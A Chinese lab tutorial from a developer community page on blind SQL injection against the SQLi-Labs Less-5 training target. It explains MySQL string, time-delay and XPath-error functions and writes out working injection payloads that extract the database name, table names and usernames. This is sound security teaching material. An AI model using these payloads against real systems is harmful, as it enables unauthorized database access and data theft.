备案控制台
开发者社区 数据库 文章 正文

【less-5】基于SQLI的SQL盲注常用函数

2024-06-18 20
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
推荐场景:
学生管理系统数据库设计 搭建个人博客
云数据库 RDS MySQL,集群版 2核4GB 100GB
推荐场景:
搭建个人博客
云数据库 RDS MySQL,高可用版 2核4GB 50GB
简介: 【less-5】基于SQLI的SQL盲注常用函数

实验目的

通过本实验理解MySQL盲注常用函数的功能,掌握MySQL盲注常用函数在SQL注入中的应用方法,熟悉SQL注入的常见流程。

实验环境

渗透平台:Kali

目标网站:SQLI平台中的Less-5

实验原理

先来分析一下Less-5源码中GET提交不同参数时的反应

(1)如果正确

(2)如果错误

(3)如果提交?id=1’时浏览器前端的反应

可以看到,如果运行返回结果正确的时候只返回you are in…,不会返回数据库当中的信息了,此时可以采用逻辑判断是否正确的盲注来获取信息。

实验步骤

第一步 登录SQLI-Labs平台

第二步 登录Kali平台,启动Firefox浏览器访问SQLI-Labs的less-5

在浏览器地址栏中输入http://【靶机IP】/Less-5/,访问SQLI-Labs的less-5。


说明:本实验Kali平台的Firefox浏览器中已预安装Hackbar插件,可使用快捷键F12启用。后续的实验步骤中,可以选择在Hackbar中来执行,或者直接在浏览器的地址栏中执行。

第三步 利用left(a,b)获取信息

LEFT()函数是一个字符串函数,它返回具有指定长度的字符串的左边部分。


LEFT(str,length);如果str或length参数为NULL,则返回NULL值。


str是要提取子字符串的字符串;


length是一个正整数,指定将从左边返回的字符数。


代码示例:

如果length为0或为负,则LEFT函数返回一个空字符串

如果length大于str字符串的长度,则LEFT函数返回整个str字符串

利用left(database(),1)进行尝试


http://【靶机IP】/Less-5?id=1’ and left(version(),1)=5–+


查看一下version(),数据库的版本号为5.3,这里的这句话的意思是看看版本号的第一位是否是5,很明显返回的结果是正确的。

第四步 利用length函数判断数据库长度、字母

length功能介绍:

返回字符串str的长度,以字节为单位。一个多字节字符算作多字节。

在mysql内置函数里面查看字符串长度的还有一个函数是char_length,两个函数的区别是:

length: 一个汉字算三个字符,一个数字或字母算一个字符。

char_length:不管汉字还是数字或者是字母都算是一个字符。

这意味着,对于包含五个两字节字符的字符串,LENGTH()返回10,而CHAR_LENGTH()返回5。

https://sqli.wmcoder.site/sqli-labs/Less-5?id=1' and length(database())=8--+

判断错误时的表现

判断正确,确定数据库长度是8

  判断正确,确定数据库名的第一个字符是s

https://sqli.wmcoder.site/sqli-labs/Less-5?id=1' and left(database(),1)='s'--+


https://sqli.wmcoder.site/sqli-labs/Less-5?id=1' and left(database(),1)='r'--+

第二位为e:

https://sqli.wmcoder.site/sqli-labs/Less-5?id=1' and left(database(),2)='se'--+

数据库名为security,8位,首位为s。

可以使用这种方法,依次猜解数据库名的各个字符是什么。

第五步 利用substr或substring函数获取表信息

(1)SUBSTR(str,pos):表示从pos开始的位置,一直截取到最后。

SUBSTR(str,pos,len):表示从pos开始的位置,截取len个字符(空格也算字符)。

(2)另外一个函数ascii()功能如下:

根据获取的数据库的名称为security,那么继续猜测security数据库下面的表信息:

测试语句

ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))>100--+


ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>101--+

判断错误

推测该数据库的第一个表的第一个字符为“e”,对应ASCII码为101

按照这种方法,依次来猜测数据库的第一个表名所对应各个字符的ASCII值是多少

ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>101--+

ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))>101--+

第一个表为emails,首字母为e,e的ASCII码为101,故与101比较

第六步 利用ord()和mid()等函数获取表中信息

(1)函数ord():返回字符串str的最左面字符的ASCII代码值。

(2)函数mid()

MID()函数用于得到一个字符串的一部分。

这个函数被MySQL支持,但不被MS SQL Server和Oracle支持。在SQL Server、Oracle 数据库中,我们可以使用SQL SUBSTRING函数或者SQL SUBSTR函数作为替代。

(3)函数cast()和convert()

MySQL的CAST()和CONVERT()函数可用来获取一个类型的值,并产生另一个类型的值。

可以转换的类型是有限制的。这个类型可以是以下值其中的一个:

代码示例:

(4)函数ifnull()

形式是IFNULL(A,B),意义是当字段A是NULL时取B,不是NULL时取A的值。

id=1' and ord(mid((select IFNULL(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68--+

D的ASCII码为68,故首先与68比较

获取user表中username中第一行的第一个字符的ascii,之后再将该ascii与我们所猜测字符对应的ascii值进行对比,从而即可得出这一个表中该字段的第一个字符。(如果查询出的结果是空值,应当转换成空字符串)

https://sqli.wmcoder.site/sqli-labs/Less-5?id=1' and ord(mid((select IFNULL(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68--+

第七步 利用延时函数sleep()或benchmark()获取信息

(1)利用sleep()函数注入

id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

当错误的时候会有5秒的时间延迟。

(2)利用benchmark()函数注入

id=1' UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+

当结果正确的时候,运行encode(‘MSG’,‘by 5 second’)操作50000000次,会占用一定的时间。

第八步 利用Xpath函数报错注入

(1)updatexml()函数

作用:改变文档中符合条件的节点的值。

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数:XML_document是String格式,为XML文档对象的名称;


第二个参数:XPath_string (Xpath格式的字符串) ;


第三个参数:new_value,String格式,替换查找到的符合条件的数据。


(2)CONCAT(str1,str2,…)函数

作用:返回结果为连接参数产生的字符串。如有任何一个参数为NULL,则返回值为NULL。

通过查询@@version,返回版本号,然后CONCAT将其字符串化。因为UPDATEXML第二个参数需要Xpath格式的字符串,所以不符合要求,然后报错。

渗透语句

id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)--+

(3)extractvalue()函数

extractvalue():对XML文档进行查询的函数,其实就是相当于HTML文件中用

标签查找元素。

语法:extractvalue(目标xml文档,xml路径)

第二个参数“xml路径”是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果写入其他格式,就会报错,并且会返回写入的非法格式内容,而这个非法的内容就是想要查询的内容。

渗透语句

id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+


思考与总结

通过本次实验,成功实现了利用各种函数功能结合SQL注入漏洞来获取MySQL数据库中的信息。

文章标签:
云数据库 RDS MySQL 版
SQL
数据库
关系型数据库
MySQL
XML
关键词:
SQL函数
sqli SQL
sqli SQL盲注
相关实践学习
基于CentOS快速搭建LAMP环境
本教程介绍如何搭建LAMP环境,其中LAMP分别代表Linux、Apache、MySQL和PHP。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
未名编程
目录
相关文章
未名编程
|
8天前
|
SQL Web App开发 安全
【less-1】基于SQLI的SQL字符型报错注入
【less-1】基于SQLI的SQL字符型报错注入
未名编程
14 2
听白
|
3天前
|
SQL Oracle 关系型数据库
SQL LAST() 函数
SQL LAST() 函数
听白
12 5
听白
|
4天前
|
SQL Oracle 关系型数据库
SQL FIRST() 函数
SQL FIRST() 函数
听白
10 3
听白
|
4天前
|
SQL Oracle 关系型数据库
SQL COUNT() 函数
SQL COUNT() 函数
听白
10 3
听白
|
4天前
|
SQL 数据库
SQL AVG() 函数
SQL AVG() 函数
听白
10 2
听白
|
5天前
|
SQL 关系型数据库 MySQL
SQL 函数
SQL 函数
听白
28 3
听白
|
6天前
|
SQL 存储 关系型数据库
SQL Date 函数
SQL Date 函数
听白
26 3
听白
|
6天前
|
SQL Oracle 关系型数据库
SQL NULL 函数
SQL NULL 函数
听白
16 1
未名编程
|
8天前
|
SQL Web App开发 前端开发
【less-11】基于SQLI的POST字符型SQL注入
【less-11】基于SQLI的POST字符型SQL注入
未名编程
18 2
sky_qiyi
|
20天前
|
SQL 关系型数据库 MySQL
MySQL数据库——基础篇总结(概述、SQL、函数、约束、多表查询、事务)一
MySQL数据库——基础篇总结(概述、SQL、函数、约束、多表查询、事务)一
sky_qiyi
25 5

热门文章

最新文章

  • 1
    Spring Boot 集成 MyBatis和 SQL Server实践
  • 2
    RDS for SQL server 空间问题排查汇总
  • 3
    flowable 输出 sql 语句
  • 4
    第 145 章 sqlmap - automatic SQL injection and database takeover tool
  • 5
    日期分组(sql)
  • 6
    PostgreSQL 10.1 手册_部分 II. SQL 语言_第 8 章 数据类型_8.16. 复合类型
  • 7
    Sql Server数据库中的更新表名、列名、列值
  • 8
    SQL Azure的第三方工具介绍(下)
  • 9
    一步一步学Linq to sql(十):多层架构MVC WCF Linq
  • 10
    sql server的连接字符串
  • 1
    [MySQL]SQL优化之索引的使用规则
    55
  • 2
    [MySQL] SQL优化之性能分析
    51
  • 3
    sql文件批处理程序-java桌面应用
    34
  • 4
    《牛客笔试选择题》sql错题集
    46
  • 5
    AI代码生成器——AI2sql
    261
  • 6
    10个高级的 SQL 查询技巧
    78
  • 7
    【问题】Cause: java.sql.SQLException: 不支持的字符集 (在类路径中添加 orai18n.jar): ZHS16GBK
    195
  • 8
    解决SQL报错:索引中丢失IN或OUT參数
    48
  • 9
    Mybatis拦截器实现带参数SQL语句打印
    72
  • 10
    Flink CDC产品常见问题之sql运行中查看日志任务失败如何解决
    155

    • 相关课程

    更多
  • 如何在 PolarDB-X 中优化慢 SQL
  • SQL完全自学手册
  • SQL Server on Linux入门教程
  • SQL入门与实践
  • 数据库及SQL/MySQL基础
  • SQL进阶及查询

    • 相关电子书

    更多
  • SQL Server在电子商务中的应用与实践
  • GeoMesa on Spark SQL
  • 原生SQL on Hadoop引擎- Apache HAWQ 2.x最新技术解密malili

    • 相关实验场景

    更多
  • PolarDB for AI:在数据库中通过SQL实现AI能力
  • 玩转MaxCompute SQL! 30分钟搞定数据分析挖掘
  • 使用SQL语句实现数据表管理
  • 使用SQL语句实现数据插入、修改和删除操作
  • 使用SQL语句实现数据查询操作
  • 使用SQL语句管理索引
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)